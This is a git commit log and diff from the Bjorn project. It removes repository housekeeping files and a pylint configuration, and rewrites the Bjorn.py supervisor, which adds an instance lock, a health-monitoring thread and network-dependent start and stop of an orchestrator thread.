6 Commits

Author SHA1 Message Date
Fabien POLLY
eb20b168a6 Add RLUtils class for managing RL/AI dashboard endpoints
- Implemented methods for fetching AI stats, training history, and recent experiences.
- Added functionality to set operation mode (MANUAL, AUTO, AI) with appropriate handling.
- Included helper methods for querying the database and sending JSON responses.
- Integrated model metadata extraction for visualization purposes.
2026-02-18 22:36:10 +01:00
Fabien POLLY
b8a13cc698 wiki test 2026-01-24 18:06:18 +01:00
Fabien POLLY
a78d05a87d Readme modified with Architecture link 2025-12-10 16:44:36 +01:00
Fabien POLLY
dec45ab608 docs: Add initial architecture documentation for Bjorn Cyberviking. 2025-12-10 16:40:52 +01:00
Fabien POLLY
d3b0b02a0b feat: Added ARCHITECTURE.md file 2025-12-10 16:39:59 +01:00
Fabien POLLY
c1729756c0 BREAKING CHANGE: Complete refactor of architecture to prepare BJORN V2 release, APIs, assets, and UI, webapp, logics, attacks, a lot of new features... 2025-12-10 16:01:03 +01:00
580 changed files with 139087 additions and 12167 deletions

2
.gitattributes vendored
View File

@@ -1,2 +0,0 @@
*.sh text eol=lf
*.py text eol=lf

15
.github/FUNDING.yml vendored
View File

@@ -1,15 +0,0 @@
# These are supported funding model platforms
#github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
#patreon: # Replace with a single Patreon username
#open_collective: # Replace with a single Open Collective username
#ko_fi: # Replace with a single Ko-fi username
#tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
#community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
#liberapay: # Replace with a single Liberapay username
#issuehunt: # Replace with a single IssueHunt username
#lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry
#polar: # Replace with a single Polar username
buy_me_a_coffee: infinition
#thanks_dev: # Replace with a single thanks.dev username
#custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']

View File

@@ -1,34 +0,0 @@
---
name: Bug report
about: Create a report to help us improve
title: ""
labels: ""
assignees: ""
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '....'
3. Scroll down to '....'
4. See error
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Hardware (please complete the following information):**
- Device: [e.g. iPhone6]
- OS: [e.g. iOS]
- Browser [e.g. chrome, safari]
- Version [e.g. 22]
**Additional context**
Add any other context about the problem here.

View File

@@ -1,11 +0,0 @@
---
# .github/ISSUE_TEMPLATE/config.yml
blank_issues_enabled: false
contact_links:
- name: Bjorn Community Support
url: https://github.com/infinition/bjorn/discussions
about: Please ask and answer questions here.
- name: Bjorn Security Reports
url: https://infinition.github.io/bjorn/SECURITY
about: Please report security vulnerabilities here.

View File

@@ -1,19 +0,0 @@
---
name: Feature request
about: Suggest an idea for this project
title: ""
labels: ""
assignees: ""
---
**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.
**Additional context**
Add any other context or screenshots about the feature request here.

View File

@@ -1,12 +0,0 @@
# .github/dependabot.yml
version: 2
updates:
- package-ecosystem: "pip"
directory: "."
schedule:
interval: "weekly"
commit-message:
prefix: "fix(deps)"
open-pull-requests-limit: 5
target-branch: "dev"

137
.gitignore vendored
View File

@@ -1,137 +0,0 @@
# Node.js / npm
node_modules/
npm-debug.log*
yarn-debug.log*
yarn-error.log*
.pnpm-debug.log*
package-lock.json*
# TypeScript / TSX
dist/
*.tsbuildinfo
# Poetry
poetry.lock
# Environment variables
.env
.env.*.local
# Logs
logs
*.log
pnpm-debug.log*
lerna-debug.log*
# Dependency directories
jspm_packages/
# Optional npm cache directory
.npm
# Output of 'npm pack'
*.tgz
# Lockfiles
yarn.lock
.pnpm-lock.yaml
# Optional eslint cache
.eslintcache
# Optional stylelint cache
.stylelintcache
# Optional REPL history
.node_repl_history
# Coverage directory used by tools like
instanbul/
istanbul/jest
jest/
coverage/
# Output of 'tsc' command
out/
build/
tmp/
temp/
# Python
__pycache__/
*.py[cod]
*.so
*.egg
*.egg-info/
pip-wheel-metadata/
*.pyo
*.pyd
*.whl
*.pytest_cache/
.tox/
env/
venv
venv/
ENV/
env.bak/
.venv/
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
# Coverage reports
htmlcov/
.coverage
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
# Jupyter Notebook
.ipynb_checkpoints
# Django stuff:
staticfiles/
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# VS Code settings
.vscode/
.idea/
# macOS files
.DS_Store
.AppleDouble
.LSOverride
# Windows files
Thumbs.db
ehthumbs.db
Desktop.ini
$RECYCLE.BIN/
# Linux system files
*.swp
*~
# IDE specific
*.iml
*.suo
*.ntvs*
*.njsproj
*.sln
*.sw?
scripts
*/certs/

652
.pylintrc
View File

@@ -1,652 +0,0 @@
[MAIN]
# Analyse import fallback blocks. This can be used to support both Python 2 and
# 3 compatible code, which means that the block might have code that exists
# only in one or another interpreter, leading to false positives when analysed.
analyse-fallback-blocks=no
# Clear in-memory caches upon conclusion of linting. Useful if running pylint
# in a server-like mode.
clear-cache-post-run=no
# Load and enable all available extensions. Use --list-extensions to see a list
# all available extensions.
#enable-all-extensions=
# In error mode, messages with a category besides ERROR or FATAL are
# suppressed, and no reports are done by default. Error mode is compatible with
# disabling specific errors.
#errors-only=
# Always return a 0 (non-error) status code, even if lint errors are found.
# This is primarily useful in continuous integration scripts.
#exit-zero=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code.
extension-pkg-allow-list=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code. (This is an alternative name to extension-pkg-allow-list
# for backward compatibility.)
extension-pkg-whitelist=
# Return non-zero exit code if any of these messages/categories are detected,
# even if score is above --fail-under value. Syntax same as enable. Messages
# specified are enabled, while categories only check already-enabled messages.
fail-on=
# Specify a score threshold under which the program will exit with error.
fail-under=8
# Interpret the stdin as a python script, whose filename needs to be passed as
# the module_or_package argument.
#from-stdin=
# Files or directories to be skipped. They should be base names, not paths.
ignore=venv,node_modules,scripts
# Add files or directories matching the regular expressions patterns to the
# ignore-list. The regex matches against paths and can be in Posix or Windows
# format. Because '\\' represents the directory delimiter on Windows systems,
# it can't be used as an escape character.
ignore-paths=
# Files or directories matching the regular expression patterns are skipped.
# The regex matches against base names, not paths. The default value ignores
# Emacs file locks
ignore-patterns=^\.#
# List of module names for which member attributes should not be checked and
# will not be imported (useful for modules/projects where namespaces are
# manipulated during runtime and thus existing member attributes cannot be
# deduced by static analysis). It supports qualified module names, as well as
# Unix pattern matching.
ignored-modules=
# Python code to execute, usually for sys.path manipulation such as
# pygtk.require().
#init-hook=
# Use multiple processes to speed up Pylint. Specifying 0 will auto-detect the
# number of processors available to use, and will cap the count on Windows to
# avoid hangs.
jobs=1
# Control the amount of potential inferred values when inferring a single
# object. This can help the performance when dealing with large functions or
# complex, nested conditions.
limit-inference-results=100
# List of plugins (as comma separated values of python module names) to load,
# usually to register additional checkers.
load-plugins=
# Pickle collected data for later comparisons.
persistent=yes
# Resolve imports to .pyi stubs if available. May reduce no-member messages and
# increase not-an-iterable messages.
prefer-stubs=no
# Minimum Python version to use for version dependent checks. Will default to
# the version used to run pylint.
py-version=3.12
# Discover python modules and packages in the file system subtree.
recursive=no
# Add paths to the list of the source roots. Supports globbing patterns. The
# source root is an absolute path or a path relative to the current working
# directory used to determine a package namespace for modules located under the
# source root.
source-roots=
# When enabled, pylint would attempt to guess common misconfiguration and emit
# user-friendly hints instead of false-positive error messages.
suggestion-mode=yes
# Allow loading of arbitrary C extensions. Extensions are imported into the
# active Python interpreter and may run arbitrary code.
unsafe-load-any-extension=no
# In verbose mode, extra non-checker-related info will be displayed.
#verbose=
[BASIC]
# Naming style matching correct argument names.
argument-naming-style=snake_case
# Regular expression matching correct argument names. Overrides argument-
# naming-style. If left empty, argument names will be checked with the set
# naming style.
#argument-rgx=
# Naming style matching correct attribute names.
attr-naming-style=snake_case
# Regular expression matching correct attribute names. Overrides attr-naming-
# style. If left empty, attribute names will be checked with the set naming
# style.
#attr-rgx=
# Bad variable names which should always be refused, separated by a comma.
bad-names=foo,
bar,
baz,
toto,
tutu,
tata
# Bad variable names regexes, separated by a comma. If names match any regex,
# they will always be refused
bad-names-rgxs=
# Naming style matching correct class attribute names.
class-attribute-naming-style=any
# Regular expression matching correct class attribute names. Overrides class-
# attribute-naming-style. If left empty, class attribute names will be checked
# with the set naming style.
#class-attribute-rgx=
# Naming style matching correct class constant names.
class-const-naming-style=UPPER_CASE
# Regular expression matching correct class constant names. Overrides class-
# const-naming-style. If left empty, class constant names will be checked with
# the set naming style.
#class-const-rgx=
# Naming style matching correct class names.
class-naming-style=PascalCase
# Regular expression matching correct class names. Overrides class-naming-
# style. If left empty, class names will be checked with the set naming style.
#class-rgx=
# Naming style matching correct constant names.
const-naming-style=UPPER_CASE
# Regular expression matching correct constant names. Overrides const-naming-
# style. If left empty, constant names will be checked with the set naming
# style.
#const-rgx=
# Minimum line length for functions/classes that require docstrings, shorter
# ones are exempt.
docstring-min-length=-1
# Naming style matching correct function names.
function-naming-style=snake_case
# Regular expression matching correct function names. Overrides function-
# naming-style. If left empty, function names will be checked with the set
# naming style.
#function-rgx=
# Good variable names which should always be accepted, separated by a comma.
good-names=i,
j,
k,
ex,
Run,
_
# Good variable names regexes, separated by a comma. If names match any regex,
# they will always be accepted
good-names-rgxs=
# Include a hint for the correct naming format with invalid-name.
include-naming-hint=no
# Naming style matching correct inline iteration names.
inlinevar-naming-style=any
# Regular expression matching correct inline iteration names. Overrides
# inlinevar-naming-style. If left empty, inline iteration names will be checked
# with the set naming style.
#inlinevar-rgx=
# Naming style matching correct method names.
method-naming-style=snake_case
# Regular expression matching correct method names. Overrides method-naming-
# style. If left empty, method names will be checked with the set naming style.
#method-rgx=
# Naming style matching correct module names.
module-naming-style=snake_case
# Regular expression matching correct module names. Overrides module-naming-
# style. If left empty, module names will be checked with the set naming style.
#module-rgx=
# Colon-delimited sets of names that determine each other's naming style when
# the name regexes allow several styles.
name-group=
# Regular expression which should only match function or class names that do
# not require a docstring.
no-docstring-rgx=^_
# List of decorators that produce properties, such as abc.abstractproperty. Add
# to this list to register other decorators that produce valid properties.
# These decorators are taken in consideration only for invalid-name.
property-classes=abc.abstractproperty
# Regular expression matching correct type alias names. If left empty, type
# alias names will be checked with the set naming style.
#typealias-rgx=
# Regular expression matching correct type variable names. If left empty, type
# variable names will be checked with the set naming style.
#typevar-rgx=
# Naming style matching correct variable names.
variable-naming-style=snake_case
# Regular expression matching correct variable names. Overrides variable-
# naming-style. If left empty, variable names will be checked with the set
# naming style.
variable-rgx=[a-z_][a-z0-9_]{2,30}$
[CLASSES]
# Warn about protected attribute access inside special methods
check-protected-access-in-special-methods=no
# List of method names used to declare (i.e. assign) instance attributes.
defining-attr-methods=__init__,
__new__,
setUp,
asyncSetUp,
__post_init__
# List of member names, which should be excluded from the protected access
# warning.
exclude-protected=_asdict,_fields,_replace,_source,_make,os._exit
# List of valid names for the first argument in a class method.
valid-classmethod-first-arg=cls
# List of valid names for the first argument in a metaclass class method.
valid-metaclass-classmethod-first-arg=mcs
[DESIGN]
# List of regular expressions of class ancestor names to ignore when counting
# public methods (see R0903)
exclude-too-few-public-methods=
# List of qualified class names to ignore when counting class parents (see
# R0901)
ignored-parents=
# Maximum number of arguments for function / method.
max-args=5
# Maximum number of attributes for a class (see R0902).
max-attributes=7
# Maximum number of boolean expressions in an if statement (see R0916).
max-bool-expr=5
# Maximum number of branch for function / method body.
max-branches=12
# Maximum number of locals for function / method body.
max-locals=15
# Maximum number of parents for a class (see R0901).
max-parents=7
# Maximum number of positional arguments for function / method.
max-positional-arguments=5
# Maximum number of public methods for a class (see R0904).
max-public-methods=20
# Maximum number of return / yield for function / method body.
max-returns=6
# Maximum number of statements in function / method body.
max-statements=50
# Minimum number of public methods for a class (see R0903).
min-public-methods=2
[EXCEPTIONS]
# Exceptions that will emit a warning when caught.
overgeneral-exceptions=builtins.BaseException,builtins.Exception
[FORMAT]
# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
expected-line-ending-format=
# Regexp for a line that is allowed to be longer than the limit.
ignore-long-lines=^\s*(# )?<?https?://\S+>?$
# Number of spaces of indent required inside a hanging or continued line.
indent-after-paren=4
# String used as indentation unit. This is usually " " (4 spaces) or "\t" (1
# tab).
indent-string=' '
# Maximum number of characters on a single line.
max-line-length=100
# Maximum number of lines in a module.
max-module-lines=2500
# Allow the body of a class to be on the same line as the declaration if body
# contains single statement.
single-line-class-stmt=no
# Allow the body of an if to be on the same line as the test if there is no
# else.
single-line-if-stmt=no
[IMPORTS]
# List of modules that can be imported at any level, not just the top level
# one.
allow-any-import-level=
# Allow explicit reexports by alias from a package __init__.
allow-reexport-from-package=no
# Allow wildcard imports from modules that define __all__.
allow-wildcard-with-all=no
# Deprecated modules which should not be used, separated by a comma.
deprecated-modules=
# Output a graph (.gv or any supported image format) of external dependencies
# to the given file (report RP0402 must not be disabled).
ext-import-graph=
# Output a graph (.gv or any supported image format) of all (i.e. internal and
# external) dependencies to the given file (report RP0402 must not be
# disabled).
import-graph=
# Output a graph (.gv or any supported image format) of internal dependencies
# to the given file (report RP0402 must not be disabled).
int-import-graph=
# Force import order to recognize a module as part of the standard
# compatibility libraries.
known-standard-library=
# Force import order to recognize a module as part of a third party library.
known-third-party=enchant
# Couples of modules and preferred modules, separated by a comma.
preferred-modules=
[LOGGING]
# The type of string formatting that logging methods do. `old` means using %
# formatting, `new` is for `{}` formatting.
logging-format-style=new
# Logging modules to check that the string format arguments are in logging
# function parameter format.
logging-modules=logging
[MESSAGES CONTROL]
# Only show warnings with the listed confidence levels. Leave empty to show
# all. Valid levels: HIGH, CONTROL_FLOW, INFERENCE, INFERENCE_FAILURE,
# UNDEFINED.
confidence=HIGH,
CONTROL_FLOW,
INFERENCE,
INFERENCE_FAILURE,
UNDEFINED
# Disable the message, report, category or checker with the given id(s). You
# can either give multiple identifiers separated by comma (,) or put this
# option multiple times (only on the command line, not in the configuration
# file where it should appear only once). You can also use "--disable=all" to
# disable everything first and then re-enable specific checks. For example, if
# you want to run only the similarities checker, you can use "--disable=all
# --enable=similarities". If you want to run only the classes checker, but have
# no Warning level messages displayed, use "--disable=all --enable=classes
# --disable=W".
disable=missing-module-docstring,
invalid-name,
too-few-public-methods,
E1101,
C0115,
duplicate-code,
raise-missing-from,
wrong-import-order,
ungrouped-imports,
reimported,
too-many-locals,
missing-timeout,
broad-exception-caught,
broad-exception-raised,
line-too-long
# Enable the message, report, category or checker with the given id(s). You can
# either give multiple identifier separated by comma (,) or put this option
# multiple time (only on the command line, not in the configuration file where
# it should appear only once). See also the "--disable" option for examples.
#enable=
[METHOD_ARGS]
# List of qualified names (i.e., library.method) which require a timeout
# parameter e.g. 'requests.api.get,requests.api.post'
timeout-methods=requests.api.delete,requests.api.get,requests.api.head,requests.api.options,requests.api.patch,requests.api.post,requests.api.put,requests.api.request
[MISCELLANEOUS]
# List of note tags to take in consideration, separated by a comma.
notes=FIXME,
XXX,
TODO
# Regular expression of note tags to take in consideration.
notes-rgx=
[REFACTORING]
# Maximum number of nested blocks for function / method body
max-nested-blocks=5
# Complete name of functions that never returns. When checking for
# inconsistent-return-statements if a never returning function is called then
# it will be considered as an explicit return statement and no message will be
# printed.
never-returning-functions=sys.exit,argparse.parse_error
# Let 'consider-using-join' be raised when the separator to join on would be
# non-empty (resulting in expected fixes of the type: ``"- " + " -
# ".join(items)``)
suggest-join-with-non-empty-separator=yes
[REPORTS]
# Python expression which should return a score less than or equal to 10. You
# have access to the variables 'fatal', 'error', 'warning', 'refactor',
# 'convention', and 'info' which contain the number of messages in each
# category, as well as 'statement' which is the total number of statements
# analyzed. This score is used by the global evaluation report (RP0004).
evaluation=max(0, 0 if fatal else 10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10))
# Template used to display messages. This is a python new-style format string
# used to format the message information. See doc for all details.
msg-template=
# Set the output format. Available formats are: text, parseable, colorized,
# json2 (improved json format), json (old json format) and msvs (visual
# studio). You can also give a reporter class, e.g.
# mypackage.mymodule.MyReporterClass.
#output-format=
# Tells whether to display a full report or only the messages.
reports=no
# Activate the evaluation score.
score=yes
[SIMILARITIES]
# Comments are removed from the similarity computation
ignore-comments=yes
# Docstrings are removed from the similarity computation
ignore-docstrings=yes
# Imports are removed from the similarity computation
ignore-imports=yes
# Signatures are removed from the similarity computation
ignore-signatures=yes
# Minimum lines number of a similarity.
min-similarity-lines=4
[SPELLING]
# Limits count of emitted suggestions for spelling mistakes.
max-spelling-suggestions=4
# Spelling dictionary name. No available dictionaries : You need to install
# both the python package and the system dependency for enchant to work.
spelling-dict=
# List of comma separated words that should be considered directives if they
# appear at the beginning of a comment and should not be checked.
spelling-ignore-comment-directives=fmt: on,fmt: off,noqa:,noqa,nosec,isort:skip,mypy:
# List of comma separated words that should not be checked.
spelling-ignore-words=
# A path to a file that contains the private dictionary; one word per line.
spelling-private-dict-file=
# Tells whether to store unknown words to the private dictionary (see the
# --spelling-private-dict-file option) instead of raising a message.
spelling-store-unknown-words=no
[STRING]
# This flag controls whether inconsistent-quotes generates a warning when the
# character used as a quote delimiter is used inconsistently within a module.
check-quote-consistency=no
# This flag controls whether the implicit-str-concat should generate a warning
# on implicit string concatenation in sequences defined over several lines.
check-str-concat-over-line-jumps=no
[TYPECHECK]
# List of decorators that produce context managers, such as
# contextlib.contextmanager. Add to this list to register other decorators that
# produce valid context managers.
contextmanager-decorators=contextlib.contextmanager
# List of members which are set dynamically and missed by pylint inference
# system, and so shouldn't trigger E1101 when accessed. Python regular
# expressions are accepted.
generated-members=
# Tells whether to warn about missing members when the owner of the attribute
# is inferred to be None.
ignore-none=yes
# This flag controls whether pylint should warn about no-member and similar
# checks whenever an opaque object is returned when inferring. The inference
# can return multiple potential results while evaluating a Python object, but
# some branches might not be evaluated, which results in partial inference. In
# that case, it might be useful to still emit no-member and other checks for
# the rest of the inferred objects.
ignore-on-opaque-inference=yes
# List of symbolic message names to ignore for Mixin members.
ignored-checks-for-mixins=no-member,
not-async-context-manager,
not-context-manager,
attribute-defined-outside-init
# List of class names for which member attributes should not be checked (useful
# for classes with dynamically set attributes). This supports the use of
# qualified names.
ignored-classes=optparse.Values,thread._local,_thread._local,argparse.Namespace
# Show a hint with possible names when a member name was not found. The aspect
# of finding the hint is based on edit distance.
missing-member-hint=yes
# The minimum edit distance a name should have in order to be considered a
# similar match for a missing member name.
missing-member-hint-distance=1
# The total number of similar names that should be taken in consideration when
# showing a hint for a missing member.
missing-member-max-choices=1
# Regex pattern to define which classes are considered mixins.
mixin-class-rgx=.*[Mm]ixin
# List of decorators that change the signature of a decorated function.
signature-mutators=
[VARIABLES]
# List of additional names supposed to be defined in builtins. Remember that
# you should avoid defining new builtins when possible.
additional-builtins=
# Tells whether unused global variables should be treated as a violation.
allow-global-unused-variables=yes
# List of names allowed to shadow builtins
allowed-redefined-builtins=
# List of strings which can identify a callback function by name. A callback
# name must start or end with one of those strings.
callbacks=cb_,
_cb
# A regular expression matching the name of dummy variables (i.e. expected to
# not be used).
dummy-variables-rgx=_+$|(_[a-zA-Z0-9_]*[a-zA-Z0-9]+?$)|dummy|^ignored_|^unused_
# Argument names that match this expression will be ignored.
ignored-argument-names=_.*|^ignored_|^unused_
# Tells whether we should check for unused import in __init__ files.
init-import=no
# List of qualified module names which can have objects that can redefine
# builtins.
redefining-builtins-modules=six.moves,past.builtins,future.builtins,builtins,io

677
Bjorn.py
View File

@@ -1,158 +1,625 @@
#bjorn.py
# This script defines the main execution flow for the Bjorn application. It initializes and starts
# various components such as network scanning, display, and web server functionalities. The Bjorn
# class manages the primary operations, including initiating network scans and orchestrating tasks.
# The script handles startup delays, checks for Wi-Fi connectivity, and coordinates the execution of
# scanning and orchestrator tasks using semaphores to limit concurrent threads. It also sets up
# signal handlers to ensure a clean exit when the application is terminated.
# Bjorn.py
# Main entry point and supervisor for the Bjorn project
# Manages lifecycle of threads, health monitoring, and crash protection.
# OPTIMIZED FOR PI ZERO 2: Low CPU overhead, aggressive RAM management.
# Functions:
# - handle_exit: handles the termination of the main and display threads.
# - handle_exit_webserver: handles the termination of the web server thread.
# - is_wifi_connected: Checks for Wi-Fi connectivity using the nmcli command.
# The script starts by loading shared data configurations, then initializes and sta
# bjorn.py test
import threading
import signal
import logging
import time
import sys
import os
import signal
import subprocess
from init_shared import shared_data
from display import Display, handle_exit_display
import sys
import threading
import time
import gc
import tracemalloc
import atexit
from comment import Commentaireia
from webapp import web_thread, handle_exit_web
from orchestrator import Orchestrator
from display import Display, handle_exit_display
from init_shared import shared_data
from logger import Logger
from orchestrator import Orchestrator
from runtime_state_updater import RuntimeStateUpdater
from webapp import web_thread
logger = Logger(name="Bjorn.py", level=logging.DEBUG)
_shutdown_lock = threading.Lock()
_shutdown_started = False
_instance_lock_fd = None
_instance_lock_path = "/tmp/bjorn_160226.lock"
try:
import fcntl
except Exception:
fcntl = None
def _release_instance_lock():
global _instance_lock_fd
if _instance_lock_fd is None:
return
try:
if fcntl is not None:
try:
fcntl.flock(_instance_lock_fd.fileno(), fcntl.LOCK_UN)
except Exception:
pass
_instance_lock_fd.close()
except Exception:
pass
_instance_lock_fd = None
def _acquire_instance_lock() -> bool:
"""Ensure only one Bjorn_160226 process can run at once."""
global _instance_lock_fd
if _instance_lock_fd is not None:
return True
try:
fd = open(_instance_lock_path, "a+", encoding="utf-8")
except Exception as exc:
logger.error(f"Unable to open instance lock file {_instance_lock_path}: {exc}")
return True
if fcntl is None:
_instance_lock_fd = fd
return True
try:
fcntl.flock(fd.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
fd.seek(0)
fd.truncate()
fd.write(str(os.getpid()))
fd.flush()
except OSError:
try:
fd.seek(0)
owner_pid = fd.read().strip() or "unknown"
except Exception:
owner_pid = "unknown"
logger.critical(f"Another Bjorn instance is already running (pid={owner_pid}).")
try:
fd.close()
except Exception:
pass
return False
_instance_lock_fd = fd
return True
class HealthMonitor(threading.Thread):
"""Periodic runtime health logger (threads/fd/rss/queue/epd metrics)."""
def __init__(self, shared_data_, interval_s: int = 60):
super().__init__(daemon=True, name="HealthMonitor")
self.shared_data = shared_data_
self.interval_s = max(10, int(interval_s))
self._stop_event = threading.Event()
self._tm_prev_snapshot = None
self._tm_last_report = 0.0
def stop(self):
self._stop_event.set()
def _fd_count(self) -> int:
try:
return len(os.listdir("/proc/self/fd"))
except Exception:
return -1
def _rss_kb(self) -> int:
try:
with open("/proc/self/status", "r", encoding="utf-8") as fh:
for line in fh:
if line.startswith("VmRSS:"):
parts = line.split()
if len(parts) >= 2:
return int(parts[1])
except Exception:
pass
return -1
def _queue_counts(self):
pending = running = scheduled = -1
try:
# Using query_one safe method from database
row = self.shared_data.db.query_one(
"""
SELECT
SUM(CASE WHEN status='pending' THEN 1 ELSE 0 END) AS pending,
SUM(CASE WHEN status='running' THEN 1 ELSE 0 END) AS running,
SUM(CASE WHEN status='scheduled' THEN 1 ELSE 0 END) AS scheduled
FROM action_queue
"""
)
if row:
pending = int(row.get("pending") or 0)
running = int(row.get("running") or 0)
scheduled = int(row.get("scheduled") or 0)
except Exception as exc:
logger.error_throttled(
f"Health monitor queue count query failed: {exc}",
key="health_queue_counts",
interval_s=120,
)
return pending, running, scheduled
def run(self):
while not self._stop_event.wait(self.interval_s):
try:
threads = threading.enumerate()
thread_count = len(threads)
top_threads = ",".join(t.name for t in threads[:8])
fd_count = self._fd_count()
rss_kb = self._rss_kb()
pending, running, scheduled = self._queue_counts()
# Lock to safely read shared metrics without race conditions
with self.shared_data.health_lock:
display_metrics = dict(getattr(self.shared_data, "display_runtime_metrics", {}) or {})
epd_enabled = int(display_metrics.get("epd_enabled", 0))
epd_failures = int(display_metrics.get("failed_updates", 0))
epd_reinit = int(display_metrics.get("reinit_attempts", 0))
epd_headless = int(display_metrics.get("headless", 0))
epd_last_success = display_metrics.get("last_success_epoch", 0)
logger.info(
"health "
f"thread_count={thread_count} "
f"rss_kb={rss_kb} "
f"queue_pending={pending} "
f"epd_failures={epd_failures} "
f"epd_reinit={epd_reinit} "
)
# Optional: tracemalloc report (only if enabled via PYTHONTRACEMALLOC or tracemalloc.start()).
try:
if tracemalloc.is_tracing():
now = time.monotonic()
tm_interval = float(self.shared_data.config.get("tracemalloc_report_interval_s", 300) or 300)
if tm_interval > 0 and (now - self._tm_last_report) >= tm_interval:
self._tm_last_report = now
top_n = int(self.shared_data.config.get("tracemalloc_top_n", 10) or 10)
top_n = max(3, min(top_n, 25))
snap = tracemalloc.take_snapshot()
if self._tm_prev_snapshot is not None:
stats = snap.compare_to(self._tm_prev_snapshot, "lineno")[:top_n]
logger.info(f"mem_top (tracemalloc diff, top_n={top_n})")
for st in stats:
logger.info(f"mem_top {st}")
else:
stats = snap.statistics("lineno")[:top_n]
logger.info(f"mem_top (tracemalloc, top_n={top_n})")
for st in stats:
logger.info(f"mem_top {st}")
self._tm_prev_snapshot = snap
except Exception as exc:
logger.error_throttled(
f"Health monitor tracemalloc failure: {exc}",
key="health_tracemalloc_error",
interval_s=300,
)
except Exception as exc:
logger.error_throttled(
f"Health monitor loop failure: {exc}",
key="health_loop_error",
interval_s=120,
)
class Bjorn:
"""Main class for Bjorn. Manages the primary operations of the application."""
def __init__(self, shared_data):
self.shared_data = shared_data
"""Main class for Bjorn. Manages orchestration lifecycle."""
def __init__(self, shared_data_):
self.shared_data = shared_data_
self.commentaire_ia = Commentaireia()
self.orchestrator_thread = None
self.orchestrator = None
self.network_connected = False
self.wifi_connected = False
self.previous_network_connected = None
self._orch_lock = threading.Lock()
self._last_net_check = 0 # Throttling for network scan
self._last_orch_stop_attempt = 0.0
def run(self):
"""Main loop for Bjorn. Waits for Wi-Fi connection and starts Orchestrator."""
# Wait for startup delay if configured in shared data
if hasattr(self.shared_data, 'startup_delay') and self.shared_data.startup_delay > 0:
"""Main loop for Bjorn. Waits for network and starts/stops Orchestrator based on mode."""
if hasattr(self.shared_data, "startup_delay") and self.shared_data.startup_delay > 0:
logger.info(f"Waiting for startup delay: {self.shared_data.startup_delay} seconds")
time.sleep(self.shared_data.startup_delay)
# Main loop to keep Bjorn running
backoff_s = 1.0
while not self.shared_data.should_exit:
if not self.shared_data.manual_mode:
self.check_and_start_orchestrator()
time.sleep(10) # Main loop idle waiting
try:
# Manual mode must stop orchestration so the user keeps full control.
if self.shared_data.operation_mode == "MANUAL":
# Avoid spamming stop requests if already stopped.
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
self.stop_orchestrator()
else:
self.check_and_start_orchestrator()
time.sleep(5)
backoff_s = 1.0 # Reset backoff on success
except Exception as exc:
logger.error(f"Bjorn main loop error: {exc}")
logger.error_throttled(
"Bjorn main loop entering backoff due to repeated errors",
key="bjorn_main_loop_backoff",
interval_s=60,
)
time.sleep(backoff_s)
backoff_s = min(backoff_s * 2.0, 30.0)
def check_and_start_orchestrator(self):
"""Check Wi-Fi and start the orchestrator if connected."""
if self.is_wifi_connected():
if self.shared_data.operation_mode == "MANUAL":
return
if self.is_network_connected():
self.wifi_connected = True
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
self.start_orchestrator()
else:
self.wifi_connected = False
logger.info("Waiting for Wi-Fi connection to start Orchestrator...")
logger.info_throttled(
"Waiting for network connection to start Orchestrator...",
key="bjorn_wait_network",
interval_s=30,
)
def start_orchestrator(self):
"""Start the orchestrator thread."""
self.is_wifi_connected() # reCheck if Wi-Fi is connected before starting the orchestrator
if self.wifi_connected: # Check if Wi-Fi is connected before starting the orchestrator
if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
logger.info("Starting Orchestrator thread...")
self.shared_data.orchestrator_should_exit = False
self.shared_data.manual_mode = False
self.orchestrator = Orchestrator()
self.orchestrator_thread = threading.Thread(target=self.orchestrator.run)
self.orchestrator_thread.start()
logger.info("Orchestrator thread started, automatic mode activated.")
else:
logger.info("Orchestrator thread is already running.")
else:
logger.warning("Cannot start Orchestrator: Wi-Fi is not connected.")
with self._orch_lock:
# Re-check network inside lock
if not self.network_connected:
return
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
logger.debug("Orchestrator thread is already running.")
return
logger.info("Starting Orchestrator thread...")
self.shared_data.orchestrator_should_exit = False
self.orchestrator = Orchestrator()
self.orchestrator_thread = threading.Thread(
target=self.orchestrator.run,
daemon=True,
name="OrchestratorMain",
)
self.orchestrator_thread.start()
logger.info("Orchestrator thread started.")
def stop_orchestrator(self):
"""Stop the orchestrator thread."""
self.shared_data.manual_mode = True
logger.info("Stop button pressed. Manual mode activated & Stopping Orchestrator...")
if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
logger.info("Stopping Orchestrator thread...")
with self._orch_lock:
thread = self.orchestrator_thread
if thread is None or not thread.is_alive():
self.orchestrator_thread = None
self.orchestrator = None
return
# Keep MANUAL sticky so supervisor does not auto-restart orchestration.
try:
self.shared_data.operation_mode = "MANUAL"
except Exception:
pass
now = time.time()
if now - self._last_orch_stop_attempt >= 10.0:
logger.info("Stop requested: stopping Orchestrator")
self._last_orch_stop_attempt = now
self.shared_data.orchestrator_should_exit = True
self.orchestrator_thread.join()
logger.info("Orchestrator thread stopped.")
self.shared_data.bjornorch_status = "IDLE"
self.shared_data.bjornstatustext2 = ""
